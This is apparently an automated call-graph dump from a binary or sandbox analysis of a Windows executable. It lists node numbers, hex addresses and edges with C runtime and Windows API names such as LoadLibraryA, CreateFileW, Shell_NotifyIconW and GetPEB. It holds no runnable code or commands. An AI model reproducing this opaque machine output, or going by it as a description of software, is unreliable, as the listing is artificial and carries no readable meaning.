LoadLibraryA GetProcAddress 94313->94264 94315 47422f 94314->94315 94316 474354 LoadLibraryA 94314->94316 94315->94264 94315->94313 94316->94315 94317 474365 GetProcAddress 94316->94317 94317->94315 94320 4934ba _doexit 94318->94320 94319 4934cd 94366 497c0e 47 API calls __getptd_noexit 94319->94366 94320->94319 94322 4934fe 94320->94322 94337 49e4c8 94322->94337 94323 4934d2 94367 496e10 8 API calls __wtof_l 94323->94367 94326 493503 94327 493519 94326->94327 94328 49350c 94326->94328 94330 493543 94327->94330 94331 493523 94327->94331 94368 497c0e 47 API calls __getptd_noexit 94328->94368 94351 49e5e0 94330->94351 94369 497c0e 47 API calls __getptd_noexit 94331->94369 94332 4934dd _doexit @_EH4_CallFilterFunc@8 94332->94270 94338 49e4d4 _doexit 94337->94338 94339 497cf4 __lock 47 API calls 94338->94339 94348 49e4e2 94339->94348 94340 49e559 94376 4969d0 47 API calls __crtLCMapStringA_stat 94340->94376 94343 49e560 94345 49e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94343->94345 94349 49e552 94343->94349 94344 49e5cc _doexit 94344->94326 94345->94349 94346 497d7c __mtinitlocknum 47 API calls 94346->94348 94348->94340 94348->94346 94348->94349 94374 494e5b 48 API calls __lock 94348->94374 94375 494ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94348->94375 94371 49e5d7 94349->94371 94352 49e600 __wopenfile 94351->94352 94353 49e61a 94352->94353 94365 49e7d5 94352->94365 94383 49185b 59 API calls 2 library calls 94352->94383 94381 497c0e 47 API calls __getptd_noexit 94353->94381 94355 49e61f 94382 496e10 8 API calls __wtof_l 94355->94382 94357 49354e 94370 493570 LeaveCriticalSection LeaveCriticalSection _fprintf 94357->94370 94358 49e838 94378 4a63c9 94358->94378 94361 49e7ce 94361->94365 94384 49185b 59 API calls 2 library calls 94361->94384 94363 49e7ed 94363->94365 94385 49185b 59 API calls 2 library calls 94363->94385 94365->94353 94365->94358 94366->94323 94367->94332 94368->94332 94369->94332 94370->94332 94377 497e58 LeaveCriticalSection 94371->94377 94373 49e5de 94373->94344 94374->94348 94375->94348 94376->94343 94377->94373 94386 4a5bb1 94378->94386 94380 4a63e2 94380->94357 94381->94355 94382->94357 94383->94361 94384->94363 94385->94365 94388 4a5bbd _doexit 94386->94388 94387 4a5bcf 94473 497c0e 47 API calls __getptd_noexit 94387->94473 94388->94387 94390 4a5c06 94388->94390 94397 4a5c78 94390->94397 94391 4a5bd4 94474 496e10 8 API calls __wtof_l 94391->94474 94394 4a5c23 94475 4a5c4c LeaveCriticalSection __unlock_fhandle 94394->94475 94396 4a5bde _doexit 94396->94380 94398 4a5c98 94397->94398 94399 49273b __wsopen_helper 47 API calls 94398->94399 94402 4a5cb4 94399->94402 94400 496e20 __invoke_watson 8 API calls 94401 4a63c8 94400->94401 94404 4a5bb1 __wsopen_helper 104 API calls 94401->94404 94403 4a5d11 94402->94403 94405 4a5cee 94402->94405 94420 4a5deb 94402->94420 94411 4a5dcf 94403->94411 94418 4a5dad 94403->94418 94406 4a63e2 94404->94406 94407 497bda __dosmaperr 47 API calls 94405->94407 94406->94394 94408 4a5cf3 94407->94408 94409 497c0e __wtof_l 47 API calls 94408->94409 94410 4a5d00 94409->94410 94412 496e10 __wtof_l 8 API calls 94410->94412 94413 497bda __dosmaperr 47 API calls 94411->94413 94414 4a5d0a 94412->94414 94415 4a5dd4 94413->94415 94414->94394 94416 497c0e __wtof_l 47 API calls 94415->94416 94417 4a5de1 94416->94417 94419 496e10 __wtof_l 8 API calls 94417->94419 94421 49a979 __wsopen_helper 52 API calls 94418->94421 94419->94420 94420->94400 94422 4a5e7b 94421->94422 94423 4a5ea6 94422->94423 94424 4a5e85 94422->94424 94425 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94423->94425 94426 497bda __dosmaperr 47 API calls 94424->94426 94434 4a5ec8 94425->94434 94427 4a5e8a 94426->94427 94429 497c0e __wtof_l 47 API calls 94427->94429 94428 4a5f46 GetFileType 94432 4a5f93 94428->94432 94433 4a5f51 GetLastError 94428->94433 94431 4a5e94 94429->94431 94430 4a5f14 GetLastError 94435 497bed __dosmaperr 47 API calls 94430->94435 94436 497c0e __wtof_l 47 API calls 94431->94436 94443 49ac0b __set_osfhnd 48 API calls 94432->94443 94437 497bed __dosmaperr 47 API calls 94433->94437 94434->94428 94434->94430 94439 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94434->94439 94440 4a5f39 94435->94440 94436->94414 94438 4a5f78 CloseHandle 94437->94438 94438->94440 94441 4a5f86 94438->94441 94442 4a5f09 94439->94442 94445 497c0e __wtof_l 47 API calls 94440->94445 94444 497c0e __wtof_l 47 API calls 94441->94444 94442->94428 94442->94430 94448 4a5fb1 94443->94448 94446 4a5f8b 94444->94446 94445->94420 94446->94440 94447 4a616c 94447->94420 94450 4a633f CloseHandle 94447->94450 94448->94447 94449 49f82f __lseeki64_nolock 49 API calls 94448->94449 94465 4a6032 94448->94465 94451 4a601b 94449->94451 94452 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94450->94452 94453 497bda __dosmaperr 47 API calls 94451->94453 94469 4a603a 94451->94469 94455 4a6366 94452->94455 94453->94465 94454 49ee0e 59 API calls __filbuf 94454->94469 94456 4a636e GetLastError 94455->94456 94457 4a61f6 94455->94457 94458 497bed __dosmaperr 47 API calls 94456->94458 94457->94420 94459 4a637a 94458->94459 94461 49ab1e __free_osfhnd 48 API calls 94459->94461 94460 49ea9c __close_nolock 50 API calls 94460->94469 94461->94457 94462 4a6f40 __chsize_nolock 81 API calls 94462->94469 94463 49f82f 49 API calls __lseeki64_nolock 94463->94465 94464 49af61 __flush 78 API calls 94464->94465 94465->94447 94465->94463 94465->94464 94465->94469 94466 4a61e9 94468 49ea9c __close_nolock 50 API calls 94466->94468 94467 4a61d2 94467->94447 94471 4a61f0 94468->94471 94469->94454 94469->94460 94469->94462 94469->94465 94469->94466 94469->94467 94470 49f82f 49 API calls __lseeki64_nolock 94469->94470 94470->94469 94472 497c0e __wtof_l 47 API calls 94471->94472 94472->94457 94473->94391 94474->94396 94475->94396 94480 4742f6 94476->94480 94479 4742cc LoadLibraryA GetProcAddress 94479->94274 94481 4742aa 94480->94481 94482 4742ff LoadLibraryA 94480->94482 94481->94274 94481->94479 94482->94481 94483 474310 GetProcAddress 94482->94483 94483->94481 94485 48f4ea 48 API calls 94484->94485 94486 4747c9 94485->94486 94486->94282 94488 474085 FindResourceExW 94487->94488 94492 4740a2 94487->94492 94489 4e4f16 LoadResource 94488->94489 94488->94492 94490 4e4f2b SizeofResource 94489->94490 94489->94492 94491 4e4f3f LockResource 94490->94491 94490->94492 94491->94492 94492->94283 94494 474526 94493->94494 94495 4e4fe0 94493->94495 94499 493a8d 94494->94499 94497 474534 94497->94294 94498->94283 94500 493a99 _doexit 94499->94500 94501 493aa7 94500->94501 94503 493acd 94500->94503 94512 497c0e 47 API calls __getptd_noexit 94501->94512 94505 494e1c __lock_file 48 API calls 94503->94505 94504 493aac 94513 496e10 8 API calls __wtof_l 94504->94513 94507 493ad3 94505->94507 94514 4939fe 81 API calls 5 library calls 94507->94514 94509 493ae2 94515 493b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94509->94515 94511 493ab7 _doexit 94511->94497 94512->94504 94513->94511 94514->94509 94515->94511 94519 493839 94516->94519 94518 474510 94518->94302 94520 493845 _doexit 94519->94520 94521 493880 _doexit 94520->94521 94522 493888 94520->94522 94523 49385b _memset 94520->94523 94521->94518 94524 494e1c __lock_file 48 API calls 94522->94524 94532 497c0e 47 API calls __getptd_noexit 94523->94532 94525 49388e 94524->94525 94534 49365b 62 API calls 5 library calls 94525->94534 94528 493875 94533 496e10 8 API calls __wtof_l 94528->94533 94530 4938a4 94535 4938c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94530->94535 94532->94528 94533->94521 94534->94530 94535->94521 94539 49344a GetSystemTimeAsFileTime 94536->94539 94538 4bbdc3 94538->94304 94540 493478 __aulldiv 94539->94540 94540->94538 94542 493e71 _doexit 94541->94542 94543 493e7f 94542->94543 94544 493e94 94542->94544 94555 497c0e 47 API calls __getptd_noexit 94543->94555 94546 494e1c __lock_file 48 API calls 94544->94546 94548 493e9a 94546->94548 94547 493e84 94556 496e10 8 API calls __wtof_l 94547->94556 94557 493b0c 55 API calls 5 library calls 94548->94557 94551 493ea5 94558 493ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94551->94558 94553 493eb7 94554 493e8f _doexit 94553->94554 94554->94309 94555->94547 94556->94554 94557->94551 94558->94553 94560 491e61 94559->94560 94563 491e55 94559->94563 94583 497c0e 47 API calls __getptd_noexit 94560->94583 94562 492019 94567 491e41 94562->94567 94584 496e10 8 API calls __wtof_l 94562->94584 94563->94560 94571 491ed4 94563->94571 94578 499d6b 47 API calls __wtof_l 94563->94578 94566 491fa0 94566->94560 94566->94567 94569 491fb0 94566->94569 94567->93845 94568 491f5f 94568->94560 94570 491f7b 94568->94570 94580 499d6b 47 API calls __wtof_l 94568->94580 94582 499d6b 47 API calls __wtof_l 94569->94582 94570->94560 94570->94567 94573 491f91 94570->94573 94571->94560 94577 491f41 94571->94577 94579 499d6b 47 API calls __wtof_l 94571->94579 94581 499d6b 47 API calls __wtof_l 94573->94581 94577->94566 94577->94568 94578->94571 94579->94577 94580->94570 94581->94567 94582->94567 94583->94562 94584->94567 94585->94240 94587 492aba _doexit 94586->94587 94588 492aec 94587->94588 94589 492ad4 94587->94589 94590 492ae4 _doexit 94587->94590 94591 494e1c __lock_file 48 API calls 94588->94591 94651 497c0e 47 API calls __getptd_noexit 94589->94651 94590->94251 94593 492af2 94591->94593 94639 492957 94593->94639 94594 492ad9 94652 496e10 8 API calls __wtof_l 94594->94652 94607 4bc581 __tzset_nolock _wcscmp 94602->94607 94603 4744ed 64 API calls 94603->94607 94604 4bc05f 94604->94218 94604->94220 94605 4bbf5a GetSystemTimeAsFileTime 94605->94607 94606 474517 83 API calls 94606->94607 94607->94603 94607->94604 94607->94605 94607->94606 94651->94594 94652->94590 94669 47bd3f 94668->94669 94672 47bd5a 94668->94672 94670 47bdfa 48 API calls 94669->94670 94671 47bd47 CharUpperBuffW 94670->94671 94671->94672 94672->93737 94674 4e436a 94673->94674 94675 472b8b 94673->94675 94676 48f4ea 48 API calls 94675->94676 94677 472b92 94676->94677 94678 472bb3 94677->94678 94769 472bce 48 API calls 94677->94769 94678->93752 94681 47e8f6 94680->94681 94703 47e906 Mailbox 94680->94703 94683 47ed52 94681->94683 94681->94703 94682 4bcc5c 86 API calls 94682->94703 94851 48e3cd 335 API calls 94683->94851 94685 47ebc7 94686 47ebdd 94685->94686 94852 472ff6 16 API calls 94685->94852 94686->93795 94688 47ed63 94688->94686 94689 47ed70 94688->94689 94853 48e312 335 API calls Mailbox 94689->94853 94690 47e94c PeekMessageW 94690->94703 94691 4e526e Sleep 94691->94703 94693 47ed77 LockWindowUpdate DestroyWindow GetMessageW 94693->94686 94695 47eda9 94693->94695 94697 4e59ef TranslateMessage DispatchMessageW GetMessageW 94695->94697 94697->94697 94700 4e5a1f 94697->94700 94698 471caa 49 API calls 94698->94703 94699 48f4ea 48 API calls 94699->94703 94700->94686 94701 47ebf7 timeGetTime 94701->94703 94702 47ed21 PeekMessageW 94702->94703 94703->94682 94703->94685 94703->94690 94703->94691 94703->94698 94703->94699 94703->94701 94703->94702 94705 476eed 48 API calls 94703->94705 94706 4e5557 WaitForSingleObject 94703->94706 94707 4e588f Sleep 94703->94707 94709 47ed3a TranslateMessage DispatchMessageW 94703->94709 94711 47edae timeGetTime 94703->94711 94713 4e5733 Sleep 94703->94713 94719 4e5445 Sleep 94703->94719 94731 47fe30 311 API calls 94703->94731 94734 4845e0 311 API calls 94703->94734 94735 483200 311 API calls 94703->94735 94736 4e5429 Mailbox 94703->94736 94738 47ce19 48 API calls 94703->94738 94739 47d6e9 55 API calls 94703->94739 94740 472aae 311 API calls 94703->94740 94770 47ef00 94703->94770 94775 47f110 94703->94775 94840 48e244 94703->94840 94845 48dc5f 94703->94845 94850 47eed0 335 API calls Mailbox 94703->94850 94855 4d8d23 48 API calls 94703->94855 94705->94703 94706->94703 94708 4e5574 GetExitCodeProcess CloseHandle 94706->94708 94707->94736 94708->94703 94709->94702 94710 47d7f7 48 API calls 94710->94736 94854 471caa 49 API calls 94711->94854 94713->94736 94716 48dc38 timeGetTime 94716->94736 94717 4e5926 GetExitCodeProcess 94720 4e593c WaitForSingleObject 94717->94720 94721 4e5952 CloseHandle 94717->94721 94719->94703 94720->94703 94720->94721 94721->94736 94722 4e5432 Sleep 94722->94719 94723 4d8c4b 108 API calls 94723->94736 94724 472c79 107 API calls 94724->94736 94726 4e59ae Sleep 94726->94703 94729 47ce19 48 API calls 94729->94736 94731->94703 94732 47d6e9 55 API calls 94732->94736 94734->94703 94735->94703 94736->94703 94736->94710 94736->94716 94736->94717 94736->94719 94736->94722 94736->94723 94736->94724 94736->94726 94736->94729 94736->94732 94856 4b4cbe 49 API calls Mailbox 94736->94856 94857 471caa 49 API calls 94736->94857 94858 472aae 335 API calls 94736->94858 94859 4cccb2 50 API calls 94736->94859 94860 4b7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94736->94860 94861 4b6532 63 API calls 3 library calls 94736->94861 94738->94703 94739->94703 94740->94703 94741->93747 94742->93798 94743->93795 94744->93795 94745->93795 94746->93741 94747->93747 94748->93798 94749->93787 94750->93787 94751->93792 94752->93798 94753->93770 94754->93798 94755->93798 94756->93798 94757->93795 94758->93795 94759->93795 94760->93795 94762 47d6f4 94761->94762 94763 47d71b 94762->94763 94884 47d764 55 API calls 94762->94884 94763->93769 94765->93798 94766->93790 94767->93744 94768->93798 94769->94678 94771 47ef2f 94770->94771 94772 47ef1d 94770->94772 94862 4bcc5c 86 API calls 4 library calls 94771->94862 94772->94703 94774 4e86f9 94774->94774 94776 47f130 94775->94776 94779 47fe30 335 API calls 94776->94779 94783 47f199 94776->94783 94777 47f3dd 94780 4e87c8 94777->94780 94791 47f3f2 94777->94791 94825 47f431 Mailbox 94777->94825 94778 47f595 94786 47d7f7 48 API calls 94778->94786 94778->94825 94781 4e8728 94779->94781 94867 4bcc5c 86 API calls 4 library calls 94780->94867 94781->94783 94864 4bcc5c 86 API calls 4 library calls 94781->94864 94783->94777 94783->94778 94787 47d7f7 48 API calls 94783->94787 94819 47f229 94783->94819 94784 47fe30 335 API calls 94784->94825 94788 4e87a3 94786->94788 94789 4e8772 94787->94789 94866 490f0a 52 API calls __cinit 94788->94866 94865 490f0a 52 API calls __cinit 94789->94865 94818 47f418 94791->94818 94868 4b9af1 48 API calls 94791->94868 94792 4e8b1b 94807 4e8bcf 94792->94807 94808 4e8b2c 94792->94808 94794 47d6e9 55 API calls 94794->94825 94796 47f770 94798 4e8a45 94796->94798 94817 47f77a 94796->94817 94797 4e8c53 94882 4bcc5c 86 API calls 4 library calls 94797->94882 94874 48c1af 48 API calls 94798->94874 94799 4e8810 94869 4ceef8 335 API calls 94799->94869 94800 47fe30 335 API calls 94820 47f6aa 94800->94820 94801 4bcc5c 86 API calls 94801->94825 94802 4e8b7e 94877 4ce40a 335 API calls Mailbox 94802->94877 94879 4bcc5c 86 API calls 4 library calls 94807->94879 94876 4cf5ee 335 API calls 94808->94876 94809 4e8beb 94880 4cbdbd 335 API calls Mailbox 94809->94880 94811 481b90 48 API calls 94811->94825 94814 481b90 48 API calls 94814->94825 94816 4e8c00 94839 47f537 Mailbox 94816->94839 94881 4bcc5c 86 API calls 4 library calls 94816->94881 94817->94814 94818->94792 94818->94820 94818->94825 94819->94777 94819->94778 94819->94818 94819->94825 94820->94796 94820->94800 94823 47fce0 94820->94823 94820->94825 94820->94839 94822 4e8823 94822->94818 94824 4e884b 94822->94824 94823->94839 94878 4bcc5c 86 API calls 4 library calls 94823->94878 94870 4cccdc 48 API calls 94824->94870 94825->94784 94825->94794 94825->94797 94825->94801 94825->94802 94825->94809 94825->94811 94825->94823 94825->94839 94863 47dd47 48 API calls _memcpy_s 94825->94863 94875 4a97ed InterlockedDecrement 94825->94875 94883 48c1af 48 API calls 94825->94883 94829 4e8857 94831 4e8865 94829->94831 94832 4e88aa 94829->94832 94871 4b9b72 48 API calls 94831->94871 94835 4e88a0 Mailbox 94832->94835 94872 4ba69d 48 API calls 94832->94872 94833 47fe30 335 API calls 94833->94839 94835->94833 94837 4e88e7 94873 47bc74 48 API calls 94837->94873 94839->94703 94842 4edf42 94840->94842 94844 48e253 94840->94844 94841 4edf77 94842->94841 94843 4edf59 TranslateAcceleratorW 94842->94843 94843->94844 94844->94703 94846 48dc71 94845->94846 94847 48dca3 94845->94847 94846->94847 94848 48dc96 IsDialogMessageW 94846->94848 94849 4edd1d GetClassLongW 94846->94849 94847->94703 94848->94846 94848->94847 94849->94846 94849->94848 94850->94703 94851->94685 94852->94688 94853->94693 94854->94703 94855->94703 94856->94736 94857->94736 94858->94736 94859->94736 94860->94736 94861->94736 94862->94774 94863->94825 94864->94783 94865->94819 94866->94825 94867->94839 94868->94799 94869->94822 94870->94829 94871->94835 94872->94837 94873->94835 94874->94825 94875->94825 94876->94825 94877->94823 94878->94839 94879->94839 94880->94816 94881->94839 94882->94839 94883->94825 94884->94763 94885->93360 94886 473742 94887 47374b 94886->94887 94888 473769 94887->94888 94889 4737c8 94887->94889 94890 4737c6 94887->94890 94894 473776 94888->94894 94895 47382c PostQuitMessage 94888->94895 94892 4737ce 94889->94892 94893 4e1e00 94889->94893 94891 4737ab DefWindowProcW 94890->94891 94901 4737b9 94891->94901 94896 4737f6 SetTimer RegisterWindowMessageW 94892->94896 94897 4737d3 94892->94897 94941 472ff6 16 API calls 94893->94941 94899 4e1e88 94894->94899 94900 473781 94894->94900 94895->94901 94896->94901 94905 47381f CreatePopupMenu 94896->94905 94902 4e1da3 94897->94902 94903 4737da KillTimer 94897->94903 94956 4b4ddd 60 API calls _memset 94899->94956 94906 473836 94900->94906 94907 473789 94900->94907 94915 4e1ddc MoveWindow 94902->94915 94916 4e1da8 94902->94916 94938 473847 Shell_NotifyIconW _memset 94903->94938 94904 4e1e27 94942 48e312 335 API calls Mailbox 94904->94942 94905->94901 94931 48eb83 94906->94931 94911 4e1e6d 94907->94911 94912 473794 94907->94912 94911->94891 94955 4aa5f3 48 API calls 94911->94955 94920 47379f 94912->94920 94921 4e1e58 94912->94921 94913 4e1e9a 94913->94891 94913->94901 94915->94901 94917 4e1dac 94916->94917 94918 4e1dcb SetFocus 94916->94918 94917->94920 94922 4e1db5 94917->94922 94918->94901 94919 4737ed 94939 47390f DeleteObject DestroyWindow Mailbox 94919->94939 94920->94891 94943 473847 Shell_NotifyIconW _memset 94920->94943 94954 4b55bd 70 API calls _memset 94921->94954 94940 472ff6 16 API calls 94922->94940 94927 4e1e68 94927->94901 94929 4e1e4c 94944 474ffc 94929->94944 94932 48eb9a _memset 94931->94932 94933 48ec1c 94931->94933 94957 4751af 94932->94957 94933->94901 94935 48ec05 KillTimer SetTimer 94935->94933 94936 48ebc1 94936->94935 94937 4e3c7a Shell_NotifyIconW 94936->94937 94937->94935 94938->94919 94939->94901 94940->94901 94941->94904 94942->94920 94943->94929 94945 475027 _memset 94944->94945 94991 474c30 94945->94991 94948 4750ac 94950 4e3d28 Shell_NotifyIconW 94948->94950 94951 4750ca Shell_NotifyIconW 94948->94951 94952 4751af 50 API calls 94951->94952 94953 4750df 94952->94953 94953->94890 94954->94927 94955->94890 94956->94913 94958 4752a2 Mailbox 94957->94958 94959 4751cb 94957->94959 94958->94936 94960 476b0f 48 API calls 94959->94960 94961 4751d9 94960->94961 94962 4751e6 94961->94962 94963 4e3ca1 LoadStringW 94961->94963 94979 476a63 94962->94979 94966 4e3cbb 94963->94966 94965 4751fb 94965->94966 94967 47520c 94965->94967 94968 47510d 48 API calls 94966->94968 94969 4752a7 94967->94969 94970 475216 94967->94970 94973 4e3cc5 94968->94973 94972 476eed 48 API calls 94969->94972 94971 47510d 48 API calls 94970->94971 94976 475220 _memset _wcscpy 94971->94976 94972->94976 94974 47518c 48 API calls 94973->94974 94973->94976 94975 4e3ce7 94974->94975 94978 47518c 48 API calls 94975->94978 94977 475288 Shell_NotifyIconW 94976->94977 94977->94958 94978->94976 94980 476adf 94979->94980 94982 476a6f __NMSG_WRITE 94979->94982 94981 47b18b 48 API calls 94980->94981 94987 476ab6 _memcpy_s 94981->94987 94983 476ad7 94982->94983 94984 476a8b 94982->94984 94990 47c369 48 API calls 94983->94990 94986 476b4a 48 API calls 94984->94986 94988 476a95 94986->94988 94987->94965 94989 48ee75 48 API calls 94988->94989 94989->94987 94990->94987 94992 474c44 94991->94992 94993 4e3c33 94991->94993 94992->94948 94995 4b5819 61 API calls _W_store_winword 94992->94995 94993->94992 94994 4e3c3c DestroyIcon 94993->94994 94994->94992 94995->94948 94996 4e19cb 95001 472322 94996->95001 94998 4e19d1 95034 490f0a 52 API calls __cinit 94998->95034 95000 4e19db 95002 472344 95001->95002 95035 4726df 95002->95035 95007 47d7f7 48 API calls 95008 472384 95007->95008 95009 47d7f7 48 API calls 95008->95009 95010 47238e 95009->95010 95011 47d7f7 48 API calls 95010->95011 95012 472398 95011->95012 95013 47d7f7 48 API calls 95012->95013 95014 4723de 95013->95014 95015 47d7f7 48 API calls 95014->95015 95016 4724c1 95015->95016 95043 47263f 95016->95043 95020 4724f1 95021 47d7f7 48 API calls 95020->95021 95022 4724fb 95021->95022 95072 472745 95022->95072 95024 472546 95025 472556 GetStdHandle 95024->95025 95026 4e501d 95025->95026 95027 4725b1 95025->95027 95026->95027 95029 4e5026 95026->95029 95028 4725b7 CoInitialize 95027->95028 95028->94998 95079 4b92d4 53 API calls 95029->95079 95031 4e502d 95080 4b99f9 CreateThread 95031->95080 95033 4e5039 CloseHandle 95033->95028 95034->95000 95081 472854 95035->95081 95038 476a63 48 API calls 95039 47234a 95038->95039 95040 47272e 95039->95040 95095 4727ec 6 API calls 95040->95095 95042 47237a 95042->95007 95044 47d7f7 48 API calls 95043->95044 95045 47264f 95044->95045 95046 47d7f7 48 API calls 95045->95046 95047 472657 95046->95047 95096 4726a7 95047->95096 95050 4726a7 48 API calls 95051 472667 95050->95051 95052 47d7f7 48 API calls 95051->95052 95053 472672 95052->95053 95054 48f4ea 48 API calls 95053->95054 95055 4724cb 95054->95055 95056 4722a4 95055->95056 95057 4722b2 95056->95057 95058 47d7f7 48 API calls 95057->95058 95059 4722bd 95058->95059 95060 47d7f7 48 API calls 95059->95060 95061 4722c8 95060->95061 95062 47d7f7 48 API calls 95061->95062 95063 4722d3 95062->95063 95064 47d7f7 48 API calls 95063->95064 95065 4722de 95064->95065 95066 4726a7 48 API calls 95065->95066 95067 4722e9 95066->95067 95068 48f4ea 48 API calls 95067->95068 95069 4722f0 95068->95069 95070 4e1fe7 95069->95070 95071 4722f9 RegisterWindowMessageW 95069->95071 95071->95020 95073 472755 95072->95073 95074 4e5f4d 95072->95074 95076 48f4ea 48 API calls 95073->95076 95101 4bc942 50 API calls 95074->95101 95078 47275d 95076->95078 95077 4e5f58 95078->95024 95079->95031 95080->95033 95102 4b99df 54 API calls 95080->95102 95088 472870 95081->95088 95084 472870 48 API calls 95085 472864 95084->95085 95086 47d7f7 48 API calls 95085->95086 95087 472716 95086->95087 95087->95038 95089 47d7f7 48 API calls 95088->95089 95090 47287b 95089->95090 95091 47d7f7 48 API calls 95090->95091 95092 472883 95091->95092 95093 47d7f7 48 API calls 95092->95093 95094 47285c 95093->95094 95094->95084 95095->95042 95097 47d7f7 48 API calls 95096->95097 95098 4726b0 95097->95098 95099 47d7f7 48 API calls 95098->95099 95100 47265f 95099->95100 95100->95050 95101->95077 95103 47ef80 95106 483b70 95103->95106 95105 47ef8c 95107 483bc8 95106->95107 95119 4842a5 95106->95119 95108 483bef 95107->95108 95109 4e6fd1 95107->95109 95112 4e6f7e 95107->95112 95120 4e6f9b 95107->95120 95110 48f4ea 48 API calls 95108->95110 95186 4cceca 335 API calls Mailbox 95109->95186 95111 483c18 95110->95111 95114 48f4ea 48 API calls 95111->95114 95112->95108 95115 4e6f87 95112->95115 95142 483c2c _memcpy_s __NMSG_WRITE 95114->95142 95183 4cd552 335 API calls Mailbox 95115->95183 95116 4e6fbe 95185 4bcc5c 86 API calls 4 library calls 95116->95185 95198 4bcc5c 86 API calls 4 library calls 95119->95198 95120->95116 95184 4cda0e 335 API calls 2 library calls 95120->95184 95121 4842f2 95205 4bcc5c 86 API calls 4 library calls 95121->95205 95124 483f2b 95124->95105 95125 4e73b0 95125->95105 95126 4e737a 95204 4bcc5c 86 API calls 4 library calls 95126->95204 95127 4e7297 95194 4bcc5c 86 API calls 4 library calls 95127->95194 95132 4e707e 95187 4bcc5c 86 API calls 4 library calls 95132->95187 95134 4840df 95195 4bcc5c 86 API calls 4 library calls 95134->95195 95135 47d6e9 55 API calls 95135->95142 95137 48dce0 53 API calls 95137->95142 95139 47d645 53 API calls 95139->95142 95142->95119 95142->95121 95142->95124 95142->95126 95142->95127 95142->95132 95142->95134 95142->95135 95142->95137 95142->95139 95143 4e72d2 95142->95143 95144 47fe30 335 API calls 95142->95144 95146 4e7350 95142->95146 95148 4e7363 95142->95148 95150 4e72e9 95142->95150 95153 476a63 48 API calls 95142->95153 95155 4e714c 95142->95155 95156 47d286 48 API calls 95142->95156 95157 48f4ea 48 API calls 95142->95157 95158 48c050 48 API calls 95142->95158 95160 4e733f 95142->95160 95164 476eed 48 API calls 95142->95164 95167 48ee75 48 API calls 95142->95167 95169 4e71e1 95142->95169 95178 47d9a0 53 API calls __cinit 95142->95178 95179 47d83d 53 API calls 95142->95179 95180 47cdb9 48 API calls 95142->95180 95181 48c15c 48 API calls 95142->95181 95182 48becb 335 API calls 95142->95182 95188 47dcae 50 API calls Mailbox 95142->95188 95189 4cccdc 48 API calls 95142->95189 95190 4ba1eb 50 API calls 95142->95190 95196 4bcc5c 86 API calls 4 library calls 95143->95196 95144->95142 95202 4bcc5c 86 API calls 4 library calls 95146->95202 95203 4bcc5c 86 API calls 4 library calls 95148->95203 95197 4bcc5c 86 API calls 4 library calls 95150->95197 95153->95142 95191 4cccdc 48 API calls 95155->95191 95156->95142 95157->95142 95158->95142 95201 4bcc5c 86 API calls 4 library calls 95160->95201 95163 4e71a1 95193 48c15c 48 API calls 95163->95193 95164->95142 95167->95142 95169->95124 95200 4bcc5c 86 API calls 4 library calls 95169->95200 95171 4e715f 95171->95163 95192 4cccdc 48 API calls 95171->95192 95172 4e71ce 95173 48c050 48 API calls 95172->95173 95175 4e71d6 95173->95175 95174 4e71ab 95174->95119 95174->95172 95175->95169 95176 4e7313 95175->95176 95199 4bcc5c 86 API calls 4 library calls 95176->95199 95178->95142 95179->95142 95180->95142 95181->95142 95182->95142 95183->95124 95184->95116 95185->95109 95186->95142 95187->95124 95188->95142 95189->95142 95190->95142 95191->95171 95192->95171 95193->95174 95194->95134 95195->95124 95196->95150 95197->95124 95198->95124 95199->95124 95200->95124 95201->95124 95202->95124 95203->95124 95204->95124 95205->95125 95206 4e9c06 95217 48d3be 95206->95217 95208 4e9c1c 95216 4e9c91 Mailbox 95208->95216 95226 471caa 49 API calls 95208->95226 95210 483200 335 API calls 95211 4e9cc5 95210->95211 95214 4ea7ab Mailbox 95211->95214 95228 4bcc5c 86 API calls 4 library calls 95211->95228 95213 4e9c71 95213->95211 95227 4bb171 48 API calls 95213->95227 95216->95210 95218 48d3ca 95217->95218 95219 48d3dc 95217->95219 95229 47dcae 50 API calls Mailbox 95218->95229 95221 48d40b 95219->95221 95222 48d3e2 95219->95222 95230 47dcae 50 API calls Mailbox 95221->95230 95223 48f4ea 48 API calls 95222->95223 95225 48d3d4 95223->95225 95225->95208 95226->95213 95227->95216 95228->95214 95229->95225 95230->95225 95231 13420f8 95245 133fd28 95231->95245 95233 13421d4 95248 1341fe8 95233->95248 95251 1343218 GetPEB 95245->95251 95247 13403b3 95247->95233 95249 1341ff1 Sleep 95248->95249 95250 1341fff 95249->95250 95252 1343242 95251->95252 95252->95247 95253 4e19dd 95258 474a30 95253->95258 95255 4e19f1 95278 490f0a 52 API calls __cinit 95255->95278 95257 4e19fb 95259 474a40 __ftell_nolock 95258->95259 95260 47d7f7 48 API calls 95259->95260 95261 474af6 95260->95261 95279 475374 95261->95279 95263 474aff 95286 47363c 95263->95286 95266 47518c 48 API calls 95267 474b18 95266->95267 95292 4764cf 95267->95292 95270 47d7f7 48 API calls 95271 474b32 95270->95271 95298 4749fb 95271->95298 95273 4761a6 48 API calls 95277 474b3d _wcscat Mailbox __NMSG_WRITE 95273->95277 95274 474b43 Mailbox 95274->95255 95275 47ce19 48 API calls 95275->95277 95276 4764cf 48 API calls 95276->95277 95277->95273 95277->95274 95277->95275 95277->95276 95278->95257 95312 49f8a0 95279->95312 95282 47ce19 48 API calls 95283 4753a7 95282->95283 95314 47660f 95283->95314 95285 4753b1 Mailbox 95285->95263 95287 473649 __ftell_nolock 95286->95287 95325 47366c GetFullPathNameW 95287->95325 95289 47365a 95290 476a63 48 API calls 95289->95290 95291 473669 95290->95291 95291->95266 95293 47651b 95292->95293 95297 4764dd _memcpy_s 95292->95297 95295 48f4ea 48 API calls 95293->95295 95294 48f4ea 48 API calls 95296 474b29 95294->95296 95295->95297 95296->95270 95297->95294 95327 47bcce 95298->95327 95301 4e41cc RegQueryValueExW 95303 4e4246 RegCloseKey 95301->95303 95304 4e41e5 95301->95304 95302 474a2b 95302->95277 95305 48f4ea 48 API calls 95304->95305 95306 4e41fe 95305->95306 95307 4747b7 48 API calls 95306->95307 95308 4e4208 RegQueryValueExW 95307->95308 95309 4e4224 95308->95309 